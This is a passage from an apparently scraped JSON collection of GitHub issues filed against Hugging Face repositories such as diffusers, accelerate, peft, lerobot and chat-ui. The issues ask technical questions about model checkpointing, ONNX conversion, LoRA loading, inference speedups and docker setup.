scripts\r\n\r\n### Tasks\r\n\r\n- [ ] One of the scripts in the examples/ folder of Accelerate or an officially supported `no_trainer` script in the `examples` folder of the `transformers` repo (such as `run_no_trainer_glue.py`)\r\n- [X] My own task or dataset (give details below)\r\n\r\n### Reproduction\r\n\r\nMy custom model inherits from torch.nn.Module.\r\nI am training this model with 4 H20 GPUs using deepspeed zero 3.\r\nI am trying to save a checkpoint with these code:\r\n`\r\n### save model\r\n if (idx % args.save_per_steps == 0) and (idx != 0):\r\n accelerator.wait_for_everyone()\r\n if (accelerator.is_local_main_process):\r\n accelerator.print('Saving model ...')\r\n save_dir = os.path.join(args.save_path, args.save_name + '_epoch_' + str(epoch) + '_step_' + str(idx))\r\n accelerator.print('Getting state dict ...')\r\n state_dict = accelerator.get_state_dict(model)\r\n accelerator.print('Unwraping model ...')\r\n unwrapped_model = accelerator.unwrap_model(model)\r\n accelerator.print('Saving checkpoint ...')\r\n unwrapped_model.save_checkpoint(save_dir, idx, state_dict)\r\n accelerator.print('Model saved!')\r\n accelerator.wait_for_everyone()\r\n`\r\n\r\n\r\n### Expected behavior\r\n\r\nThe code stuck when getting state dict.\r\nI also tried `accelerator.save_model` but it couldn't work.\r\n\r\nI am wondering what's the recommend\u200c way to save and load a large model training with deepspeed zero 3?\r\nThank you very much.", "url": "https://github.com/huggingface/accelerate/issues/3320", "state": "closed", "labels": [], "created_at": "2025-01-02T08:15:36Z", "updated_at": "2025-02-10T15:07:18Z", "user": "amoyplane" }, { "repo": "huggingface/diffusers", "number": 10425, "title": "Euler Flow Matching Scheduler Missing Documentation for Parameters", "body": "### Describe the bug\n\nThe Euler flow matching scheduler in Hugging Face Diffusers is missing clear documentation for its parameters, making it difficult for users to understand how to configure the scheduler effectively for different use cases.\n\n### Reproduction\n\nSteps to Reproduce:\r\n\r\nVisit the Hugging Face Diffusers documentation page and locate the section for the Euler flow matching scheduler.\r\nTry to find documentation for the scheduler\u2019s parameters.\r\nNotice that the documentation does not clearly define the parameters or explain their effects.\n\n### Logs\n\n_No response_\n\n### System Info\n\nHugging Face Diffusers version: 0.16.1\r\nPyTorch version: 2.1.0\r\nCUDA version: 11.8\r\nCPU: Intel Core i7-12700K\r\nGPU: NVIDIA RTX 3090\n\n### Who can help?\n\n@sayakpaul @DN6", "url": "https://github.com/huggingface/diffusers/issues/10425", "state": "closed", "labels": [ "bug" ], "created_at": "2025-01-02T01:37:38Z", "updated_at": "2025-01-02T01:38:38Z", "comments": 0, "user": "hanshengzhu0001" }, { "repo": "huggingface/transformers.js", "number": 1130, "title": "Tips on Converting Newer Models", "body": "### Question\n\n\ud83c\udf89\ud83c\udf89Happy New Year to the incredible Transformers.js team!\ud83c\udf89\ud83c\udf89\r\n\r\nAs I work on converting new (text-generation) models for use with Transformers.js.\r\nHere's what i've tried since last week :\r\n\r\n* python converter script \r\n* optimum cli onnx\r\n* onnx-community/convert-to-onnx spaces\r\n\r\nthe problem i encounter as i move forward to newer models, i realize that the converter is looking for specific files like the ff below which is easy to convert both locally and online:\r\n![image](https://github.com/user-attachments/assets/bdb031eb-c87a-4e1a-b895-7608b94699d0)\r\n\r\nwhile some newer models consist files like of the ff below which i couldn't convert:\r\n![image](https://github.com/user-attachments/assets/01058d6a-f232-4ed5-87fe-2df82b346025)\r\n\r\ni have no problem with pc specs at all, i maybe missing some steps, rules or understanding converting models. I\u2019d greatly appreciate any tips, best practices, or resources you could share to streamline the process and ensure compatibility.\r\n\r\nMuch Appreciated!\r\n", "url": "https://github.com/huggingface/transformers.js/issues/1130", "state": "open", "labels": [ "question" ], "created_at": "2025-01-01T05:32:09Z", "updated_at": "2025-01-01T05:32:09Z", "user": "josephencila" }, { "repo": "huggingface/lerobot", "number": 606, "title": "Dataset does not support length of feature shape > 1", "body": "Hi, \r\n\r\nThank you for this excellent project!\r\nI am trying to create a custom dataset with additional sensory information (such as tactile data) which is an Array3D tensor, but find that when I use the approach mentioned in #547, there is no support to add custom tensor like observations to the episode buffer. \r\n\r\nSpecifically there are assertions that require the feature shape to be a 1D array at most [here](https://github.com/huggingface/lerobot/blob/59e275743499c5811a9f651a8947e8f881c4058c/lerobot/common/datasets/utils.py#L274)", "url": "https://github.com/huggingface/lerobot/issues/606", "state": "closed", "labels": [ "question", "dataset", "stale" ], "created_at": "2024-12-31T21:08:26Z", "updated_at": "2025-10-19T02:32:29Z", "user": "akashsharma02" }, { "repo": "huggingface/finetrainers", "number": 169, "title": "How to build a dataset for finetuning CogVideoX I2V 1.5", "body": "Hi,\r\nI want to finetune the CogVideoX I2V 1.5 (5B) model. I have a set of videos that I want to use, but first I need to preprocess them so they meet the requirements of the model. Do I have to make sure that my fine-tuning dataset meets the generation properties of the model? That is, in the case of CogVideoX 1.5, the videos should be:\r\n\r\n- Min(W, H) = 768\r\n- 768 \u2264 Max(W, H) \u2264 1360\r\n- Max(W, H) % 16 = 0\r\n- Video Length: 5 seconds or 10 seconds\r\n- Frame Rate: 16 frames / second\r\n\r\nDo I need to make sure that all my fine-tuning videos follow those guidelines?", "url": "https://github.com/huggingface/finetrainers/issues/169", "state": "closed", "labels": [], "created_at": "2024-12-31T19:55:00Z", "updated_at": "2025-03-08T23:43:31Z", "user": "royvelich" }, { "repo": "huggingface/diffusers", "number": 10416, "title": "Euler flow matching scheduler is missing documentation for parameters", "body": "![image](https://github.com/user-attachments/assets/ecd16c04-8f31-42fc-9f30-e660cf4f5853)\r\n\r\nI think there are some undocumented parameters here.", "url": "https://github.com/huggingface/diffusers/issues/10416", "state": "closed", "labels": [], "created_at": "2024-12-31T13:15:35Z", "updated_at": "2025-01-09T18:54:41Z", "comments": 4, "user": "bghira" }, { "repo": "huggingface/chat-ui", "number": 1636, "title": "Any way to pass authorization header from Oauth2 down to custom endpoint?", "body": "## Describe your feature request\r\n\r\nIt would be nice to be able to pass the authorization header from Oauth2 to custom endpoint. I have an endpoint that mimicks TGI and I would like to authenticate every request in order to protect the api,\r\n\r\n## Implementation idea\r\n\r\nJust pass an authorization header from frontend to bff and pass it further to the endpoint. It could be a custom header if that would conflict with the current authorization configuration for endpoints. The current configuration allows to pass a static auth header, but I want to be able to pass the jwt of the authenticated user.", "url": "https://github.com/huggingface/chat-ui/issues/1636", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-12-31T13:00:22Z", "updated_at": "2024-12-31T13:00:22Z", "comments": 0, "user": "corte" }, { "repo": "huggingface/diffusers", "number": 10415, "title": "[Pipelines] Add AttentiveEraser", "body": "### Model/Pipeline/Scheduler description\r\n\r\nI\u2019ve worked on a project called AttentiveEraser, which is a tuning-free method for object removal in images using diffusion models. The code for this project is built upon modifications to existing Diffusers pipelines, so it should be relatively straightforward to integrate it into the library.\r\n## About AttentiveEraser\r\nAttentiveEraser enhances object removal capabilities by using self-attention redirection guidance. It supports different levels of mask precision (semantic segmentation, bounding boxes, and hand-drawn masks) and effectively fills in removed regions by leveraging the generative power of diffusion models.\r\n## Help Needed\r\nAs someone new to this process, I\u2019m unsure how to properly package this into a Diffusers pipeline. Is anyone interested in collaborating on this integration or able to provide guidance on the steps I should take next?\r\nI\u2019d love to contribute this feature to the community, and the relevant code is already available!\r\nCode: \r\nLooking forward to any suggestions or assistance!\r\n![fenmian](https://github.com/user-attachments/assets/6c21a68a-be14-437c-89db-a2059557b7a9)\r\n\r\n\r\n\r\n\r\n### Open source status\r\n\r\n- [X] The model implementation is available.\r\n- [X] The model weights are available (Only relevant if addition is not a scheduler).\r\n\r\n### Provide useful links for the implementation\r\n\r\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/10415", "state": "closed", "labels": [ "stale" ], "created_at": "2024-12-31T07:44:48Z", "updated_at": "2025-02-05T15:54:43Z", "comments": 7, "user": "Anonym0u3" }, { "repo": "huggingface/diffusers", "number": 10414, "title": "[] Translating docs to Chinese", "body": "\r\n\r\nHi!\r\n\r\nLet's bring the documentation to all the -speaking community \ud83c\udf10.\r\n\r\nWho would want to translate? Please follow the \ud83e\udd17 [TRANSLATING guide](https://github.com/huggingface/diffusers/blob/main/docs/TRANSLATING.md). Here is a list of the files ready for translation. Let us know in this issue if you'd like to translate any, and we'll add your name to the list.\r\n\r\nSome notes:\r\n\r\n* Please translate using an informal tone (imagine you are talking with a friend about Diffusers \ud83e\udd17).\r\n* Please translate in a gender-neutral way.\r\n* Add your translations to the folder called `` inside the [source folder](https://github.com/huggingface/diffusers/tree/main/docs/source).\r\n* Register your translation in `/_toctree.yml`; please follow the order of the [English version](https://github.com/huggingface/diffusers/blob/main/docs/source/en/_toctree.yml).\r\n* Once you're finished, open a pull request and tag this issue by including #issue-number in the description, where issue-number is the number of this issue. Please ping @stevhliu for review.\r\n* \ud83d\ude4b If you'd like others to help you with the translation, you can also post in the \ud83e\udd17 [forums](https://discuss.huggingface.co/c/discussion-related-to-httpsgithubcomhuggingfacediffusers/63).\r\n\r\nThank you so much for your help! \ud83e\udd17\r\n", "url": "https://github.com/huggingface/diffusers/issues/10414", "state": "closed", "labels": [], "created_at": "2024-12-31T06:45:21Z", "updated_at": "2024-12-31T06:49:52Z", "comments": 0, "user": "S20180576" }, { "repo": "huggingface/peft", "number": 2301, "title": "How to pass in an attention _ mask that is one dimension more than input _ ids", "body": "### System Info\n\nHello, how can I pass in `attention_mask` that has one more dimension than `input_ids`, for example: `output = peft_model.generate(input_ids,attention_mask=attention_mask,max_new_tokens=100)` The `input_ids` dimension is [bitch_size,N], and the `attention_mask` dimension is [bitch_size,N,N]. \r\nUnder this condition, when the above line of code is run, the following error will be reported: \r\nFile \"/root/anaconda3/lib/python3.10/site-packages/transformers/modeling_attn_mask_utils.py\", line 179, in _expand_mask bsz, src_len = mask.size() \r\nValueError: too many values \u200b\u200bto unpack (expected 2)\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [X] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\n`\r\n\r\n input_ids = torch.cat([\r\n (torch.ones(input_ids.shape[0], 1) * uni_prompting.sptids_dict['<|mmu|>']).to(device),\r\n (torch.ones(input_ids.shape[0], 1) * uni_prompting.sptids_dict['<|soi|>']).to(device),\r\n image_tokens,\r\n (torch.ones(input_ids.shape[0], 1) * uni_prompting.sptids_dict['<|eoi|>']).to(device),\r\n (torch.ones(input_ids.shape[0], 1) * uni_prompting.sptids_dict['<|sot|>']).to(device),\r\n input_ids\r\n ], dim=1).long()\r\n\r\n attention_mask = create_attention_mask_for_mmu(input_ids.to(device),\r\n eoi_id=int(uni_prompting.sptids_dict['<|eoi|>']))\r\n cont_toks_list = peft_model.generate(input_ids,attention_mask=attention_mask,max_new_tokens=100)`\n\n### Expected behavior\n\nRead the model for fine-tuning and reasoning.", "url": "https://github.com/huggingface/peft/issues/2301", "state": "closed", "labels": [], "created_at": "2024-12-31T02:26:14Z", "updated_at": "2025-02-07T15:03:57Z", "user": "Chinesehou97" }, { "repo": "huggingface/diffusers", "number": 10411, "title": "How to call the training of lora weights obtained from examples/concestency_stiffness/train_lcm-distill-lora_std_wds. py", "body": "I followed https://github.com/huggingface/diffusers/tree/main/examples/consistency_distillation The provided tutorial trained the final Lora weight, but did not find a way to call it. May I ask if you can provide me with a demo of running and calling this weight? Thank you very much!\r\nthe training set:\r\n```\r\n#!/bin/bash\r\n\r\n# Define the variables\r\nPRETRAINED_TEACHER_MODEL=\"/ai/yzy/latent-consistency-model-main/stable-diffusion-v1-5\"\r\nOUTPUT_DIR=\"/ai/yzy/latent-consistency-model-main/output_sd001\"\r\nRESOLUTION=512\r\nLORA_RANK=64\r\nLEARNING_RATE=1e-6\r\nLOSS_TYPE='huber'\r\nADAM_WEIGHT_DECAY=0.0\r\nMAX_TRAIN_STEPS=1000\r\nMAX_TRAIN_SAMPLES=4000000\r\nDATALOADER_NUM_WORKERS=4\r\nTRAIN_SHARDS_PATH_OR_URL='/ai/yzy/latent-consistency-model-main/00000.tar'\r\nVALIDATION_STEPS=200\r\nCHECKPOINTING_STEPS=200\r\nCHECKPOINTS_TOTAL_LIMIT=10\r\nTRAIN_BATCH_SIZE=8\r\nGRADIENT_ACCUMULATION_STEPS=1\r\nSEED=453645634\r\n\r\n# Run the training script\r\npython ./LCM_Training_Script/consistency_distillation/train_lcm_distill_lora_sd_wds.py \\\r\n --pretrained_teacher_model=$PRETRAINED_TEACHER_MODEL \\\r\n --output_dir=$OUTPUT_DIR \\\r\n --mixed_precision=fp16 \\\r\n --resolution=$RESOLUTION \\\r\n --lora_rank=$LORA_RANK \\\r\n --learning_rate=$LEARNING_RATE \\\r\n --loss_type=$LOSS_TYPE \\\r\n --adam_weight_decay=$ADAM_WEIGHT_DECAY \\\r\n --max_train_steps=$MAX_TRAIN_STEPS \\\r\n --max_train_samples=$MAX_TRAIN_SAMPLES \\\r\n --dataloader_num_workers=$DATALOADER_NUM_WORKERS \\\r\n --train_shards_path_or_url=$TRAIN_SHARDS_PATH_OR_URL \\\r\n --validation_steps=$VALIDATION_STEPS \\\r\n --checkpointing_steps=$CHECKPOINTING_STEPS \\\r\n --checkpoints_total_limit=$CHECKPOINTS_TOTAL_LIMIT \\\r\n --train_batch_size=$TRAIN_BATCH_SIZE \\\r\n --gradient_checkpointing \\\r\n --enable_xformers_memory_efficient_attention \\\r\n --gradient_accumulation_steps=$GRADIENT_ACCUMULATION_STEPS \\\r\n --use_8bit_adam \\\r\n --resume_from_checkpoint=latest \\\r\n --seed=$SEED\r\n```\r\n\r\nthe output:\r\n![image](https://github.com/user-attachments/assets/5fb9a474-52d9-4d2f-85e4-dd5c3e0902db)\r\n", "url": "https://github.com/huggingface/diffusers/issues/10411", "state": "closed", "labels": [], "created_at": "2024-12-30T12:06:07Z", "updated_at": "2024-12-31T07:21:40Z", "user": "yangzhenyu6" }, { "repo": "huggingface/text-embeddings-inference", "number": 461, "title": "How to Set the Threshold for gte-multilingual-reranker", "body": "I want to use the gte-multilingual-reranker-base model to re-rank the retrieved documents and discard some of them based on a threshold. I have seen examples on Hugging Face where the logits are used as the output scores, but how can I determine the appropriate threshold?", "url": "https://github.com/huggingface/text-embeddings-inference/issues/461", "state": "open", "labels": [], "created_at": "2024-12-30T11:39:48Z", "updated_at": "2025-02-09T06:29:02Z", "user": "ketusrai" }, { "repo": "huggingface/optimum", "number": 2140, "title": "KeyError: 'swinv2 model type is not supported yet in NormalizedConfig.", "body": "### System Info\n\n```shell\nGoogle Colab\r\nT4 GPU\r\ntransformers Version: 4.47.1\r\noptimum Version: 1.24.0.dev0\n```\n\n\n### Who can help?\n\n@michaelbenayoun, @JingyaHuang, @echarlaix\n\n### Information\n\n- [X] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [X] My own task or dataset (give details below)\n\n### Reproduction (minimal, reproducible, runnable)\n\nfrom optimum.onnxruntime import ORTModelForVision2Seq\r\nmodel = ORTModelForVision2Seq.from_pretrained(\"/content/swin-xlm-image-recognition\", export=True, use_cache=False)\r\nmodel.save_pretrained(\"swin-xlm-image-recognition-onnx\")\n\n### Expected behavior\n\nHow to solve this issue? I am trying to convert my VisionEncoderDecoderModel to onnx using optimum, but I am getting this error: `KeyError: 'swinv2 model type is not supported yet in NormalizedConfig. Only albert, bart, bert, blenderbot, blenderbot-small, bloom, falcon, camembert, codegen, cvt, deberta, deberta-v2, deit, distilbert, donut-swin, electra, encoder-decoder, gemma, gpt2, gpt-bigcode, gpt-neo, gpt-neox, gptj, imagegpt, llama, longt5, marian, markuplm, mbart, mistral, mixtral, mpnet, mpt, mt5, m2m-100, nystromformer, opt, pegasus, pix2struct, phi, phi3, phi3small, poolformer, regnet, resnet, roberta, segformer, speech-to-text, splinter, t5, trocr, vision-encoder-decoder, vit, whisper, xlm-roberta, yolos, qwen2, granite are supported. If you want to support swinv2 please propose a PR or open up an issue.'`\r\n\r\nThe encoder is \"swinv2\" and the decoder is \"xlm-roberta\".", "url": "https://github.com/huggingface/optimum/issues/2140", "state": "open", "labels": [ "bug" ], "created_at": "2024-12-30T10:29:14Z", "updated_at": "2024-12-30T10:29:14Z", "comments": 0, "user": "Billybeast2003" }, { "repo": "huggingface/optimum-intel", "number": 1096, "title": "How to use trainer.train() with OVModelForCausalLM() model", "body": "I am currently converting a local LLM to Open Vino, I would like to fine tune my model with the Trainer function but I get an error stating: AttributeError: 'OVModelForCausalLM' object has no attribute 'named_children'\r\n\r\nPlease let me know if there is a way to fine tune openVino models that are loaded with OVModelForCausalLM().\r\n\r\nAttached is my script\r\n[Fine_Tuning_mistral_7b_v3 (2).zip](https://github.com/user-attachments/files/18271287/Fine_Tuning_mistral_7b_v3.2.zip)\r\n", "url": "https://github.com/huggingface/optimum-intel/issues/1096", "state": "closed", "labels": [], "created_at": "2024-12-29T23:54:26Z", "updated_at": "2025-02-27T14:54:20Z", "user": "CJames1261" }, { "repo": "huggingface/trl", "number": 2523, "title": "How to solve the situation where the tokenizer of the reward model is inconsistent with the tokenizer of the actor model\uff1f", "body": "", "url": "https://github.com/huggingface/trl/issues/2523", "state": "open", "labels": [ "\u2753 question" ], "created_at": "2024-12-27T09:43:06Z", "updated_at": "2024-12-28T06:26:16Z", "user": "stephen-nju" }, { "repo": "huggingface/peft", "number": 2298, "title": "Qdora support", "body": "### Feature request\n\nis it possible to use qdora with peft?\n\n### Motivation\n\nqdora is better than qlora and perform like full fine tuning.\n\n### Your contribution\n\n```\r\npeft_config = LoraConfig(\r\n r=8, \r\n lora_alpha=32, \r\n lora_dropout=0.1,\r\n qdora=True # adding qdora\r\n)\r\n```", "url": "https://github.com/huggingface/peft/issues/2298", "state": "closed", "labels": [], "created_at": "2024-12-27T04:47:54Z", "updated_at": "2025-01-03T12:26:58Z", "comments": 2, "user": "imrankh46" }, { "repo": "huggingface/smolagents", "number": 2, "title": "How to call OpenAI-like models through an API?", "body": "How to call OpenAI-like models through an API?", "url": "https://github.com/huggingface/smolagents/issues/2", "state": "closed", "labels": [], "created_at": "2024-12-27T04:34:35Z", "updated_at": "2024-12-29T21:58:10Z", "user": "win4r" }, { "repo": "huggingface/datasets", "number": 7347, "title": "Converting Arrow to WebDataset TAR Format for Offline Use", "body": "### Feature request\n\nHi, \r\n\r\nI've downloaded an Arrow-formatted dataset offline using the hugggingface's datasets library by:\r\n\r\n```\r\nimport json\r\nfrom datasets import load_dataset\r\n\r\ndataset = load_dataset(\"pixparse/cc3m-wds\")\r\ndataset.save_to_disk(\"./cc3m_1\") \r\n```\r\n\r\nnow I need to convert it to WebDataset's TAR format for offline data ingestion. \r\nIs there a straightforward method to achieve this conversion without an internet connection? Can I simply convert it by \r\n```\r\ntar -cvf \r\n```\r\n\r\nbtw, when I tried:\r\n```\r\nimport webdataset as wds\r\nfrom huggingface_hub import get_token\r\nfrom torch.utils.data import DataLoader\r\n\r\nhf_token = get_token()\r\nurl = \"https://huggingface.co/datasets/timm/imagenet-12k-wds/resolve/main/imagenet12k-train-{{0000..1023}}.tar\"\r\nurl = f\"pipe:curl -s -L {url} -H 'Authorization:Bearer {hf_token}'\"\r\ndataset = wds.WebDataset(url).decode()\r\ndataset.save_to_disk(\"./cc3m_webdataset\") \r\n```\r\nerror occured:\r\n```\r\nAttributeError: 'WebDataset' object has no attribute 'save_to_disk'\r\n```\r\n\r\nThanks a lot!\n\n### Motivation\n\nConverting Arrow to WebDataset TAR Format\n\n### Your contribution\n\nNo clue yet", "url": "https://github.com/huggingface/datasets/issues/7347", "state": "closed", "labels": [ "enhancement" ], "created_at": "2024-12-27T01:40:44Z", "updated_at": "2024-12-31T17:38:00Z", "comments": 4, "user": "katie312" }, { "repo": "huggingface/transformers.js", "number": 1118, "title": "Trying to use custom finetuned Whisper Model with ", "body": "### Question\n\n@xenova I am trying to use our own Whisper fine tuned model https://huggingface.co/medxcribe/whisper-base.en with\r\n\r\nhttps://huggingface.co/spaces/Xenova/whisper-web. I have uploaded into a seperate repo for reference https://huggingface.co/medxcribe/whisper-base-onnx.en.\r\n\r\nWe have converted the fine tuned medxcribe/whisper-base.en using this command. \r\n\r\n`pip install onnx==1.17.0\r\npip install onnxruntime==1.20.1\r\npip install transformers==4.35.2\r\noptimum-cli export onnx --model medxcribe/whisper-base.en whisper_onnx --task automatic-speech-recognition-with-past --opset 14`\r\n\r\nBut unfortunately while load the Whisper-web, we are stuck with this below error \r\n\r\nCan't create a session\"\r\n at t.createSessionFinalize (http://localhost:4173/assets/worker-1c2c88a7.js:1789:105945)\r\n at t.createSession (http://localhost:4173/assets/worker-1c2c88a7.js:1789:106543)\r\n at t.createSession (http://localhost:4173/assets/worker-1c2c88a7.js:1789:98867)\r\n at t.OnnxruntimeWebAssemblySessionHandler.loadModel (http://localhost:4173/assets/worker-1c2c88a7.js:1789:101717)\r\n at Object.createSessionHandler (http://localhost:4173/assets/worker-1c2c88a7.js:9:115048)\r\n at dn.create (http://localhost:4173/assets/worker-1c2c88a7.js:1:14653)\r\n at async constructSession (http://localhost:4173/assets/worker-1c2c88a7.js:1810:22248)\r\n at async Promise.all (index 2)\r\n at async WhisperForConditionalGeneration.from_pretrained (http://localhost:4173/assets/worker-1c2c88a7.js:1810:29662)\r\n at async AutoModelForSpeechSeq2Seq.from_pretrained (http://localhost:4173/assets/worker-1c2c88a7.js:1810:77285)\r\n\r\nAny suggestions? On a high level there is a problem with the generated Onnx files. ", "url": "https://github.com/huggingface/transformers.js/issues/1118", "state": "open", "labels": [ "question" ], "created_at": "2024-12-26T20:18:36Z", "updated_at": "2024-12-26T20:18:36Z", "user": "vijaim" }, { "repo": "huggingface/finetrainers", "number": 153, "title": "How to generate result of validation and resolution. ", "body": "Hi author:\r\nI am using your hunyuan finetuning bash to finetune lora on my own dataset with original resolution of 1080p. But I find your model can only run on video with both height and weight can be divided by 32. Can the model also be trained on video with 360p or 720p and why?", "url": "https://github.com/huggingface/finetrainers/issues/153", "state": "closed", "labels": [], "created_at": "2024-12-26T15:21:22Z", "updated_at": "2025-01-10T23:38:39Z", "user": "Aristo23333" }, { "repo": "huggingface/lerobot", "number": 597, "title": "Inquiry About Support for RDT-1B Model", "body": "Hi,\r\nI would like to extend my heartfelt thanks for maintaining such an outstanding codebase. Your dedication and hard work have significantly contributed to advancements in the robotics field, and I truly appreciate the resources and support your community provides.\r\n\r\nI am reaching out to inquire whether there are any plans to support the RDT-1B model from the [RoboticsDiffusionTransformer](https://github.com/thu-ml/RoboticsDiffusionTransformer) repository within the LeRobot framework. The RDT-1B model appears to offer promising capabilities for robotics applications, and integrating it could potentially enhance the functionalities and performance of projects built on LeRobot.\r\n\r\nCould you please let me know if there are any intentions to incorporate this model in the future, or if there are any existing efforts towards this integration? Additionally, if there are ways the community can assist or contribute to this effort, I would be eager to participate.\r\n\r\nThank you once again for all your contributions and support. I look forward to your response.", "url": "https://github.com/huggingface/lerobot/issues/597", "state": "closed", "labels": [ "question", "policies", "stale" ], "created_at": "2024-12-26T11:12:58Z", "updated_at": "2025-10-08T20:52:51Z", "user": "Robert-hua" }, { "repo": "huggingface/diffusers", "number": 10383, "title": "[Request] Optimize HunyuanVideo Inference Speed with ParaAttention", "body": "Hi guys,\r\n\r\nFirst and foremost, I would like to commend you for the incredible work on the `diffusers` library. It has been an invaluable resource for my projects.\r\n\r\nI am writing to suggest an enhancement to the inference speed of the `HunyuanVideo` model. We have found that using [ParaAttention](https://github.com/chengzeyi/ParaAttention) can significantly speed up the inference of HunyuanVideo. ParaAttention provides context parallel attention that works with `torch.compile`, supporting Ulysses Style and Ring Style parallelism. I hope we could add a doc or introduction of how to make `HunyuanVideo` of `diffusers` run faster with `ParaAttention`. Besides `HunyuanVideo`, `FLUX`, `Mochi` and `CogVideoX` are also supported.\r\n\r\nSteps to Optimize HunyuanVideo Inference with `ParaAttention`:\r\n\r\n# Install ParaAttention:\r\n\r\n```bash\r\npip3 install para-attn\r\n# Or visit https://github.com/chengzeyi/ParaAttention.git to see detailed instructions\r\n```\r\n\r\n# Example Script:\r\nHere is an example script to run HunyuanVideo with ParaAttention:\r\n\r\n```python\r\nimport torch\r\nimport torch.distributed as dist\r\nfrom diffusers import HunyuanVideoPipeline, HunyuanVideoTransformer3DModel\r\nfrom diffusers.utils import export_to_video\r\n\r\ndist.init_process_group()\r\n\r\n# [rank1]: RuntimeError: Expected mha_graph->execute(handle, variant_pack, workspace_ptr.get()).is_good() to be true, but got false. (Could this error message be improved? If so, please report an enhancement request to PyTorch.)\r\ntorch.backends.cuda.enable_cudnn_sdp(False)\r\n\r\nmodel_id = \"tencent/HunyuanVideo\"\r\ntransformer = HunyuanVideoTransformer3DModel.from_pretrained(\r\n model_id,\r\n subfolder=\"transformer\",\r\n torch_dtype=torch.bfloat16,\r\n revision=\"refs/pr/18\",\r\n)\r\npipe = HunyuanVideoPipeline.from_pretrained(\r\n model_id,\r\n transformer=transformer,\r\n torch_dtype=torch.float16,\r\n revision=\"refs/pr/18\",\r\n).to(f\"cuda:{dist.get_rank()}\")\r\n\r\npipe.vae.enable_tiling(\r\n # Make it runnable on GPUs with 48GB memory\r\n # tile_sample_min_height=128,\r\n # tile_sample_stride_height=96,\r\n # tile_sample_min_width=128,\r\n # tile_sample_stride_width=96,\r\n # tile_sample_min_num_frames=32,\r\n # tile_sample_stride_num_frames=24,\r\n)\r\n\r\nfrom para_attn.context_parallel import init_context_parallel_mesh\r\nfrom para_attn.context_parallel.diffusers_adapters import parallelize_pipe\r\nfrom para_attn.parallel_vae.diffusers_adapters import parallelize_vae\r\n\r\nmesh = init_context_parallel_mesh(\r\n pipe.device.type,\r\n)\r\nparallelize_pipe(\r\n pipe,\r\n mesh=mesh,\r\n)\r\nparallelize_vae(pipe.vae, mesh=mesh._flatten())\r\n\r\n# pipe.enable_model_cpu_offload(gpu_id=dist.get_rank())\r\n\r\n# torch._inductor.config.reorder_for_compute_comm_overlap = True\r\n# pipe.transformer = torch.compile(pipe.transformer, mode=\"max-autotune-no-cudagraphs\")\r\n\r\noutput = pipe(\r\n prompt=\"A cat walks on the grass, realistic\",\r\n height=720,\r\n width=1280,\r\n num_frames=129,\r\n num_inference_steps=30,\r\n output_type=\"pil\" if dist.get_rank() == 0 else \"pt\",\r\n).frames[0]\r\n\r\nif dist.get_rank() == 0:\r\n print(\"Saving video to hunyuan_video.mp4\")\r\n export_to_video(output, \"hunyuan_video.mp4\", fps=15)\r\n\r\ndist.destroy_process_group()\r\n```\r\n\r\nSave the above code to `run_hunyuan_video.py` and run it with torchrun:\r\n\r\n```bash\r\ntorchrun --nproc_per_node=2 run_hunyuan_video.py\r\n```\r\n\r\nThe generated video on 2xH100:\r\n\r\nhttps://github.com/user-attachments/assets/e67838a7-5261-452e-9bf0-9f186611c3b7\r\n\r\nBy following these steps, users can leverage `ParaAttention` to achieve faster inference times with `HunyuanVideo` on multiple GPUs.\r\n\r\nThank you for considering this suggestion. I believe it could greatly benefit the community and enhance the performance of `HunyuanVideo`. Please let me know if there are any questions or further clarifications needed.", "url": "https://github.com/huggingface/diffusers/issues/10383", "state": "closed", "labels": [ "roadmap" ], "created_at": "2024-12-25T15:07:53Z", "updated_at": "2025-01-16T18:05:15Z", "comments": 10, "user": "chengzeyi" }, { "repo": "huggingface/lerobot", "number": 596, "title": "How to achieve multiple tasks on the basis of LeRobot \uff1f", "body": "LeRobot can achieve single tasks (such as inserting, transferring blocks, etc.), how to achieve multiple tasks on the basis of LeRobot (such as first recognizing objects and classifying, and then putting objects in order in boxes, etc.)?\"\r\nPlease give me some ideas.", "url": "https://github.com/huggingface/lerobot/issues/596", "state": "closed", "labels": [ "question", "stale" ], "created_at": "2024-12-25T12:20:37Z", "updated_at": "2025-10-17T11:38:20Z", "user": "wangwisdom" }, { "repo": "huggingface/diffusers", "number": 10375, "title": "[low priority] Please fix links in documentation", "body": "https://huggingface.co/docs/diffusers/main/en/api/pipelines/hunyuan_video\r\n\r\nBoth links are broken\r\n\r\nMake sure to check out the Schedulers [guide](https://huggingface.co/docs/diffusers/main/en/using-diffusers/schedulers.md) to learn how to explore the tradeoff between scheduler speed and quality, and see the [reuse components across pipelines](https://huggingface.co/docs/diffusers/main/en/using-diffusers/loading.md#reuse-a-pipeline) section to learn how to efficiently load the same components into multiple pipelines.", "url": "https://github.com/huggingface/diffusers/issues/10375", "state": "closed", "labels": [], "created_at": "2024-12-25T09:04:33Z", "updated_at": "2024-12-28T20:01:27Z", "comments": 0, "user": "nitinmukesh" }, { "repo": "huggingface/diffusers", "number": 10374, "title": "Is there any plan to support TeaCache for training-free acceleration?", "body": "TeaCache is a training-free inference acceleration method for visual generation. TeaCache currently supports HunyuanVideo, CogVideoX, Open-Sora, Open-Sora-Plan and Latte. TeaCache can speedup HunyuanVideo 2x without much visual quality degradation. For example, the inference for a 720p, 129-frame video takes around 50 minutes on a single A800 GPU while TeaCache can sppeedup to 23 minutes. Thanks for your efforts!\r\nhttps://github.com/LiewFeng/TeaCache.\r\n", "url": "https://github.com/huggingface/diffusers/issues/10374", "state": "open", "labels": [ "wip" ], "created_at": "2024-12-25T05:00:23Z", "updated_at": "2025-01-27T01:28:53Z", "comments": 4, "user": "LiewFeng" }, { "repo": "huggingface/chat-ui", "number": 1633, "title": "docker run is not working", "body": "I'm running the following:\r\n```\r\ndocker run -p 3000:3000 --env-file env.local huggingface/chat-ui\r\n```\r\nThe env file has the following set: `HF_TOKEN`, `MONGODB_URL` and `MODELS`. The container prints the following:\r\n```\r\nListening on 0.0.0.0:3000\r\n```\r\n\r\nHowever, on hitting the `localhost:3000`, I get a blank page with `Not found`.\r\n\r\nI can repro this consistently. Can anyone share who is able to use docker and get it to work.", "url": 